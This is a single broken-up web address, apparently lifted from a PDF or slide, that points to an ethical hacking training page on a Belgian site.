hWp://www.dataflow.be/en/ethical-‐hacking-‐training-‐hacking-‐
explained-‐condensed